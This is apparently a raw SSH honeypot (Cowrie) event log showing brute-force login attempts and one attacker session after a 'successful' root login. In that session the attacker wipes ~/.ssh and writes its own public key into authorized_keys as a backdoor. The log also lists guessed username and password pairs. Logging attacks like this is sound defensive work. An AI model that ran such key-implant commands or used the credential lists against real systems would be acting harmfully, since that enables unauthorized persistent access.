{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:48:38.738473Z","src_ip":"212.227.235.229","session":"a2e6ddcc0779"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56192,"dst_ip":"1.2.3.4","dst_port":22,"session":"7133fdcb5ba7","protocol":"ssh","message":"New connection: 212.227.235.229:56192 (1.2.3.4:22) [session: 7133fdcb5ba7]","sensor":"my-vps","timestamp":"2025-09-08T13:48:38.835850Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:48:38.836722Z","src_ip":"212.227.235.229","session":"7133fdcb5ba7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:48:38.938173Z","src_ip":"212.227.235.229","session":"7133fdcb5ba7"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:48:39.441084Z","src_ip":"212.227.235.229","session":"7133fdcb5ba7"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:48:39.552725Z","src_ip":"212.227.235.229","session":"7133fdcb5ba7"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:48:39.554242Z","src_ip":"212.227.235.229","session":"acde3b40f6ff"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":51664,"dst_ip":"1.2.3.4","dst_port":22,"session":"7c777ac59e9e","protocol":"ssh","message":"New connection: 134.199.174.250:51664 (1.2.3.4:22) [session: 7c777ac59e9e]","sensor":"my-vps","timestamp":"2025-09-08T13:48:54.499236Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:48:54.589934Z","src_ip":"134.199.174.250","session":"7c777ac59e9e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:48:54.798033Z","src_ip":"134.199.174.250","session":"7c777ac59e9e"}
{"eventid":"cowrie.login.failed","username":"www-data","password":"1234567890","message":"login attempt [www-data/1234567890] failed","sensor":"my-vps","timestamp":"2025-09-08T13:48:55.989162Z","src_ip":"134.199.174.250","session":"7c777ac59e9e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35992,"dst_ip":"1.2.3.4","dst_port":22,"session":"c812e6311a5d","protocol":"ssh","message":"New connection: 212.227.235.229:35992 (1.2.3.4:22) [session: c812e6311a5d]","sensor":"my-vps","timestamp":"2025-09-08T13:48:56.173700Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:48:56.175266Z","src_ip":"212.227.235.229","session":"c812e6311a5d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:48:56.298791Z","src_ip":"212.227.235.229","session":"c812e6311a5d"}
{"eventid":"cowrie.login.failed","username":"red","password":"2025","message":"login attempt [red/2025] failed","sensor":"my-vps","timestamp":"2025-09-08T13:48:56.831804Z","src_ip":"212.227.235.229","session":"c812e6311a5d"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:48:57.285775Z","src_ip":"134.199.174.250","session":"7c777ac59e9e"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:48:57.959765Z","src_ip":"212.227.235.229","session":"c812e6311a5d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60824,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a48d7275e51","protocol":"ssh","message":"New connection: 212.227.235.229:60824 (1.2.3.4:22) [session: 6a48d7275e51]","sensor":"my-vps","timestamp":"2025-09-08T13:49:06.384251Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:49:06.385124Z","src_ip":"212.227.235.229","session":"6a48d7275e51"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:49:06.617527Z","src_ip":"212.227.235.229","session":"6a48d7275e51"}
{"eventid":"cowrie.login.failed","username":"operator","password":"!","message":"login attempt [operator/!] failed","sensor":"my-vps","timestamp":"2025-09-08T13:49:07.570194Z","src_ip":"212.227.235.229","session":"6a48d7275e51"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:49:08.798465Z","src_ip":"212.227.235.229","session":"6a48d7275e51"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":31725,"dst_ip":"1.2.3.4","dst_port":22,"session":"7611407c2cf3","protocol":"ssh","message":"New connection: 49.247.35.31:31725 (1.2.3.4:22) [session: 7611407c2cf3]","sensor":"my-vps","timestamp":"2025-09-08T13:49:09.514243Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:49:09.520218Z","src_ip":"49.247.35.31","session":"7611407c2cf3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:49:09.803302Z","src_ip":"49.247.35.31","session":"7611407c2cf3"}
{"eventid":"cowrie.login.success","username":"root","password":"159159159","message":"login attempt [root/159159159] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:49:11.015262Z","src_ip":"49.247.35.31","session":"7611407c2cf3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:49:11.616551Z","src_ip":"49.247.35.31","session":"7611407c2cf3"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:49:11.617253Z","src_ip":"49.247.35.31","session":"7611407c2cf3"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:49:11.618269Z","src_ip":"49.247.35.31","session":"7611407c2cf3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:49:11.904601Z","src_ip":"49.247.35.31","session":"7611407c2cf3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:49:12.575021Z","src_ip":"49.247.35.31","session":"7611407c2cf3"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:49:12.575676Z","src_ip":"49.247.35.31","session":"7611407c2cf3"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:49:12.876683Z","src_ip":"49.247.35.31","session":"7611407c2cf3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:49:12.877533Z","src_ip":"49.247.35.31","session":"7611407c2cf3"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":51317,"dst_ip":"1.2.3.4","dst_port":22,"session":"d12bf98bff6d","protocol":"ssh","message":"New connection: 49.247.35.31:51317 (1.2.3.4:22) [session: d12bf98bff6d]","sensor":"my-vps","timestamp":"2025-09-08T13:49:13.138494Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:49:13.157691Z","src_ip":"49.247.35.31","session":"d12bf98bff6d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:49:13.419688Z","src_ip":"49.247.35.31","session":"d12bf98bff6d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:49:14.502952Z","src_ip":"49.247.35.31","session":"d12bf98bff6d"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:49:15.780479Z","src_ip":"49.247.35.31","session":"d12bf98bff6d"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":42905,"dst_ip":"1.2.3.4","dst_port":22,"session":"6ce6b5145398","protocol":"ssh","message":"New connection: 49.247.35.31:42905 (1.2.3.4:22) [session: 6ce6b5145398]","sensor":"my-vps","timestamp":"2025-09-08T13:49:16.073949Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:49:16.081131Z","src_ip":"49.247.35.31","session":"6ce6b5145398"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:49:16.374125Z","src_ip":"49.247.35.31","session":"6ce6b5145398"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:49:17.554822Z","src_ip":"49.247.35.31","session":"6ce6b5145398"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:49:17.841178Z","src_ip":"49.247.35.31","session":"7611407c2cf3"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:49:17.842350Z","src_ip":"49.247.35.31","session":"6ce6b5145398"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":42822,"dst_ip":"1.2.3.4","dst_port":22,"session":"7c83b4a53d72","protocol":"ssh","message":"New connection: 134.199.174.250:42822 (1.2.3.4:22) [session: 7c83b4a53d72]","sensor":"my-vps","timestamp":"2025-09-08T13:49:27.298893Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:49:27.352969Z","src_ip":"134.199.174.250","session":"7c83b4a53d72"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:49:27.565803Z","src_ip":"134.199.174.250","session":"7c83b4a53d72"}
{"eventid":"cowrie.login.failed","username":"www-data","password":"password1","message":"login attempt [www-data/password1] failed","sensor":"my-vps","timestamp":"2025-09-08T13:49:28.582925Z","src_ip":"134.199.174.250","session":"7c83b4a53d72"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:49:29.952804Z","src_ip":"134.199.174.250","session":"7c83b4a53d72"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51868,"dst_ip":"1.2.3.4","dst_port":22,"session":"a12d8eab0cb5","protocol":"ssh","message":"New connection: 212.227.235.229:51868 (1.2.3.4:22) [session: a12d8eab0cb5]","sensor":"my-vps","timestamp":"2025-09-08T13:49:46.141664Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:49:46.142949Z","src_ip":"212.227.235.229","session":"a12d8eab0cb5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@